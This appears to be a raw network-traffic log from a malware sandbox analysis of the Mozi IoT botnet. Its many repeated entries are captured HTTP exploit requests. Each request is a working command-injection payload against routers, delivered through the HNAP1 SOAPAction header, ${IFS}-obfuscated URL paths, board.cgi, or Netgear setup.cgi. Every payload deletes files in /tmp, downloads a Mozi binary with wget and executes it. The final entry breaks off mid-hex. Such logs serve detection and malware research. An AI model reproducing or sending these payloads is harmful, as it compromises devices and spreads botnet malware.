Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 104.124.230.135:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 179.40.62.87:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 204.232.228.51:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 45.148.37.237:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 123.110.194.55:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 154.3.84.96:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 185.36.171.129:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 166.88.13.234:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 